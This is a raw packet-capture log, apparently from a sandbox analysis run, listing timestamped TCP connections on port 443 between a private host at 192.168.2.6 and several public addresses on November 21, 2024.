Nov 21, 2024 09:53:51.482413054 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.482619047 CET	49778	443	192.168.2.6	20.234.120.54
Nov 21, 2024 09:53:51.482646942 CET	443	49778	20.234.120.54	192.168.2.6
Nov 21, 2024 09:53:51.494143009 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.494194031 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.494218111 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.494229078 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.494268894 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.509100914 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.509160042 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.509181976 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.509191036 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.509221077 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.509248018 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.515322924 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:51.547811985 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.547914028 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.548440933 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.548470020 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.548675060 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.548687935 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.644438982 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.644469976 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.644530058 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.644556046 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.644587994 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.644608974 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.655550957 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.655589104 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.655622959 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.655636072 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.655667067 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.655685902 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.668314934 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.668339968 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.668380022 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.668384075 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.668425083 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.681077957 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.681101084 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.681155920 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.681160927 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.681201935 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.692989111 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.693037033 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.693072081 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.693077087 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.693115950 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.705861092 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.705887079 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.705955982 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.705960989 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.705997944 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.716924906 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.716954947 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.716995001 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.717001915 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.717039108 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.729684114 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.729710102 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.729744911 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.729752064 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.729787111 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.737843990 CET	443	49762	213.186.33.5	192.168.2.6
Nov 21, 2024 09:53:51.737900972 CET	49762	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:51.738061905 CET	49762	443	192.168.2.6	213.186.33.5
Nov 21, 2024 09:53:51.738080025 CET	443	49762	213.186.33.5	192.168.2.6
Nov 21, 2024 09:53:51.853770971 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.853807926 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.853852987 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.853878975 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.853915930 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.853933096 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.864794970 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.864824057 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.864870071 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.864880085 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.864928961 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.874578953 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.874605894 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.874656916 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.874664068 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.874685049 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.874706984 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.884469032 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.884493113 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.884526014 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.884533882 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.884562969 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.884598017 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.893338919 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.893367052 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.893423080 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.893433094 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.893491030 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.901212931 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.901241064 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.901277065 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.901287079 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.901329041 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.912544966 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.912570953 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.912616968 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.912625074 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.912653923 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.912671089 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.922112942 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.922137976 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.922175884 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:51.922183990 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:51.922230959 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.036834002 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.036869049 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.036885977 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.036910057 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.036957026 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.036969900 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.036992073 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.037014961 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.063546896 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.063595057 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.063779116 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.063807964 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.063858032 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.072123051 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.072144985 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.072227955 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.072232962 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.072274923 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.080727100 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.080749989 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.080790043 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.080795050 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.080826998 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.080848932 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.089406013 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.089427948 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.089478016 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.089484930 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.089531898 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.097524881 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.097551107 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.097599983 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.097604990 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.097641945 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.105009079 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.105036020 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.105077982 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.105082989 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.105108976 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.105129004 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.113889933 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.113924980 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.114000082 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.114020109 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.114078999 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.119891882 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.119940042 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.119971037 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.119988918 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.120004892 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.120027065 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.120053053 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.139848948 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.139873981 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.139882088 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.139890909 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.139935017 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.139964104 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:52.140001059 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.140016079 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:52.140048981 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:52.166398048 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.166496038 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.166507959 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:52.166562080 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:52.232722044 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.232750893 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.232842922 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.232881069 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.233201027 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.278039932 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.278073072 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.278179884 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.278264046 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.278300047 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.278322935 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.286006927 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:52.286032915 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.286043882 CET	49771	443	192.168.2.6	4.175.87.197
Nov 21, 2024 09:53:52.286051989 CET	443	49771	4.175.87.197	192.168.2.6
Nov 21, 2024 09:53:52.314100981 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.319029093 CET	49773	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.319048882 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.326783895 CET	49773	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.326790094 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.346755028 CET	49768	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.346771955 CET	443	49768	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.409265041 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.409286022 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.409358978 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.409441948 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.409538984 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.409614086 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.414278984 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:52.414468050 CET	443	49728	142.250.185.132	192.168.2.6
Nov 21, 2024 09:53:52.414659977 CET	49728	443	192.168.2.6	142.250.185.132
Nov 21, 2024 09:53:52.440071106 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.440098047 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.440164089 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.440192938 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.440227032 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.440291882 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.459764957 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.459786892 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.459836006 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.459852934 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.459881067 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.460016012 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.467911959 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.468400955 CET	49775	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.468421936 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.468889952 CET	49775	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.468894005 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.481676102 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.482212067 CET	49774	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.482255936 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.482815027 CET	49774	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.482825994 CET	443	49774	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.517473936 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.517504930 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.517563105 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.517652035 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.517692089 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.517719030 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.607181072 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.607235909 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.607254028 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.607291937 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.607306957 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.607395887 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.618381023 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.620229006 CET	49777	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.620246887 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.620773077 CET	49777	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.620779037 CET	443	49777	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.623522997 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.623548985 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.623620987 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.623652935 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.623903990 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.640002966 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.640036106 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.640079021 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.640115976 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.640136957 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.640161037 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.651114941 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.651141882 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.651186943 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.651221991 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.651241064 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.651259899 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.664016962 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.664050102 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.664108038 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.664133072 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.664158106 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.664172888 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.674638987 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.675085068 CET	49776	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.675117016 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.675545931 CET	49776	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.675551891 CET	443	49776	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.747082949 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.747173071 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.747337103 CET	49773	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.747566938 CET	49773	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.747567892 CET	49773	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.747594118 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.747606993 CET	443	49773	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.750670910 CET	49779	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.750715971 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.750912905 CET	49779	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.751142025 CET	49779	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.751152992 CET	443	49779	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.800137997 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.800165892 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.800215006 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.800252914 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.800272942 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.800285101 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.808427095 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.808451891 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.808532000 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.808567047 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.808593035 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.808610916 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.818443060 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.818460941 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.818525076 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.818561077 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.818599939 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.828650951 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.828670979 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.828768015 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.828802109 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.828900099 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.837465048 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.837490082 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.837534904 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.837568998 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.837600946 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.837610006 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.846808910 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.846828938 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.846892118 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.846921921 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.846936941 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.846957922 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.856972933 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.856992006 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.857037067 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.857064962 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.857089043 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.857101917 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.876660109 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.876678944 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.876753092 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.876806974 CET	443	49772	150.171.27.10	192.168.2.6
Nov 21, 2024 09:53:52.876832962 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.877207041 CET	49772	443	192.168.2.6	150.171.27.10
Nov 21, 2024 09:53:52.915807009 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.915898085 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.916059017 CET	49775	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.916085958 CET	49775	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.916094065 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.916105032 CET	49775	443	192.168.2.6	13.107.246.45
Nov 21, 2024 09:53:52.916110039 CET	443	49775	13.107.246.45	192.168.2.6
Nov 21, 2024 09:53:52.918860912 CET	49780	443	192.168.2.6	13.107.246.45
